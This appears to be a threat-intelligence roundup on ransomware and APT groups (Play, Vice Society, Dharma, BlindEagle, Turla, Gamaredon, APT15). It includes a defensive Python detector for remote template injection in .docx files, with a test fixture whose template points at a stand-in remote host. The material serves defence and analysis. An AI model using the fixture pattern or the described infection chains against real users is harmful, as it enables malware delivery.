The Play Ransomware (AKA PlayCrypt) employs various techniques to evade detection and complicate analysis. It uses return-oriented programming to bypass static analysis and obscures important strings in memory. It initializes and retrieves cryptographic algorithm providers, then encrypts files by generating an AES key, calling BCryptGenRandom to generate a random buffer, and setting the chaining mode. The encryption process avoids the Windows directory, and the default chaining mode is set to AES-GCM, but changes to AES-CBC if the file size is greater than a certain threshold. The malware enumerates volumes on the victim's system to determine which to encrypt, and the final drive path to be encrypted is set to the network drive's universal or connection name.

Vice Society

The Vice Society threat group has been identified as a cybercriminal organization targeting a variety of sectors, including manufacturing companies in Brazil. It has been active since 2021, utilizing various ransomware variants such as Hello Kitty, Five Hands, and Zeppelin. However, in late 2022, the group developed their own custom ransomware called PolyVice. This malware not only encrypts files but also steals sensitive data and deletes volume shadow copies, making it harder for victims to recover their data.

Dharma Ransomware

Dharma ransomware is a form of malware that encrypts a target's files and requires payment in exchange for the decryption key. It is a variation of the CrySIS ransomware family first discovered in 2016, typically spread through phishing emails, software vulnerabilities, or exploit kits. The ransomware appends a ".dharma" or ".wallet" extension to the file name after encryption and displays a ransom note asking for payment in Bitcoin. However, paying the ransom does not guarantee file recovery and experts advise against it, suggesting instead to restore from backups or use decryption tools. To prevent infections, it is crucial to keep software up to date, practice safe browsing, and be aware that the Dharma ransomware actors may use double extortion tactics, which means they not only encrypt files but also steal and threaten to publicize sensitive information if the ransom is not paid.

The Oldies

BlindEagle

BlindEagle, AKA APT-C-36, is a financially motivated threat group known since 2018 for launching indiscriminate attacks against citizens of various countries in South America. It has recently been conducting a targeted phishing campaign against victims in Colombia and Ecuador, using QuasarRAT malware delivered through a series of spear-phishing emails.

The emails, purporting to be from the Colombian and Ecuadorian governments, contain both a shortened URL link and a PDF attachment, both of which lead to a compressed and password-protected file with an LHA extension. Once downloaded, the malware is unpacked and deployed to the victim's machine, with the infection process being terminated if the request is made from a machine outside of Colombia.

In an additional, more elaborate campaign, Ecuador and Colombia were again targeted with phishing emails, this time made to appear as if they were from the Ecuadorian government. This campaign involved delivering a RAR file containing an executable Python file. This file would spawn the Windows binary MSHTA to retrieve additional payloads, including scripts that would perform system checks, disable anti-malware/behavior detection software, and ultimately load an in-memory Meterpreter payload.

Turla

The Turla APT group (AKA Snake, VENOMOUS Bear, Group 88, Waterbug, WRAITH, Uroburos, Pfinet, TAG_0530, KRYPTON, Hippo Team, Pacifier APT, Popeye, SIG23, IRON HUNTER, MAKERSMARK, ATK13, G0010, ITG12, Blue Python), known for targeting government entities and embassies, was found to be using variants of the Andromeda, KopiLuwak, and QUIETCANARY malware families to infiltrate systems in Ukraine. These tools were used to create a backdoor, perform reconnaissance, and exfiltrate data to the attackers' command-and-control servers.

The group has been known to target embassies in Eastern Bloc nations and has been linked to attacks on the offices of a former Soviet Union member country's prime minister and government entities in Western Europe, Central America, the Middle East, and the United States. The group's use of encryption has made it difficult to determine the extent of their data exfiltration. Attribution to the group is difficult, but it has been suspected to be linked to Russian state-sponsored actors.

Gamaredon

The Gamaredon APT group (AKA ACTINIUM, DEV-0157, Blue Otso, BlueAlpha, G0047, IRON TILDEN, PRIMITIVE BEAR, Shuckworm, Trident Ursa, UAC-0010, Winterflounder) was detected targeting Ukrainian government organizations by utilizing the Telegram messaging service to evade conventional network detection methods.

The Telegram application was utilized throughout various stages of the attack, from victim profiling to delivering the final payload. The initial method of infection involved weaponized spear-phishing documents written in Russian and Ukrainian languages.

The threat actor leveraged a remote template injection vulnerability to infect targets with malware and bypass macro protection in Microsoft Word. Upon opening the malicious document, the malware downloads a Visual Basic script from a designated address, which connects to a Telegram account to receive further instructions.
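Remote template injection leaves a concrete artifact in the document itself: Word resolves the `attachedTemplate` relationship in `word/_rels/settings.xml.rels` when the file is opened, so a document that points that relationship at an http(s) or UNC location is the thing to flag before it ever reaches a user. The following is an added example for this summary (not the researchers' code, and the documents are built in memory rather than taken from the campaign): it opens a .docx as the ZIP container it is and reports any remote attached-template target, while leaving the normal case of a local `.dotm` path alone. The host name in the sample is invented.

```python
"""Check a .docx for a remote attached template, the remote template injection
technique described above: Word follows the attachedTemplate relationship in
word/_rels/settings.xml.rels at open time, so an http(s) or UNC Target there
is the indicator. Added example for this summary, not code from the cited
research; the sample documents are built in memory."""
import io
import re
import zipfile
from xml.etree import ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                          "relationships/attachedTemplate")
SETTINGS_RELS = "word/_rels/settings.xml.rels"
# http(s) URLs and UNC paths; a local file path (even file:///) is normal for Word.
REMOTE_TARGET = re.compile(r"^(https?://|\\\\)", re.IGNORECASE)


def find_remote_templates(docx_bytes):
    """Return the list of remote (URL or UNC) attached-template targets in a .docx."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if SETTINGS_RELS not in zf.namelist():
            return []  # no settings relationships at all: nothing for Word to follow
        root = ET.fromstring(zf.read(SETTINGS_RELS))
    remote = []
    for rel in root.iter(f"{{{REL_NS}}}Relationship"):
        if rel.get("Type") != ATTACHED_TEMPLATE_TYPE:
            continue
        target = rel.get("Target", "")
        if REMOTE_TARGET.match(target):
            remote.append(target)
    return remote


def build_docx(template_target=None):
    """Build a minimal .docx in memory, optionally with an attached template."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                    "<w:body><w:p><w:r><w:t>Constructed sample</w:t></w:r></w:p></w:body></w:document>")
        if template_target is not None:
            zf.writestr("word/settings.xml",
                        '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
                        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
                        '<w:attachedTemplate r:id="rId1"/></w:settings>')
            zf.writestr(SETTINGS_RELS,
                        f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
                        f'Type="{ATTACHED_TEMPLATE_TYPE}" Target="{template_target}" '
                        'TargetMode="External"/></Relationships>')
    return buf.getvalue()


# Constructed samples: no template, a local template, and a remote one.
PLAIN_DOCX = build_docx()
LOCAL_TEMPLATE_DOCX = build_docx(r"C:\Users\alice\AppData\Roaming\Microsoft\Templates\Normal.dotm")
REMOTE_TEMPLATE_DOCX = build_docx("https://template-host.invalid/lure.dotm")

if __name__ == "__main__":
    for name, doc in (("plain", PLAIN_DOCX), ("local", LOCAL_TEMPLATE_DOCX),
                      ("remote", REMOTE_TEMPLATE_DOCX)):
        print(name, find_remote_templates(doc))
```

This check belongs at the mail gateway or in a sandbox pre-filter, where a document can be rejected on the relationship alone without executing anything. Word writes `TargetMode="External"` for local templates as well, which is why the code keys on the target's scheme rather than on that attribute.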

APT15

APT15 (AKA Vixen Panda, Ke3chang, Playful Dragon, Metushy, Lurid, Social Network Team, Royal Apt, Bronze Palace, Bronze Davenport, Bronze Idlewood, Nickel, G0004, or Red Vulture) is a sophisticated cyber threat group that operates globally and conducts various cyber operations.

The group was recently seen targeting Iranian telecommunications and diplomatic sectors using the Turian backdoor. This malware is equipped with VMProtect, making it challenging to analyze, and includes multiple functions such as launching reverse shells and executing commands from its command-and-control server.

 
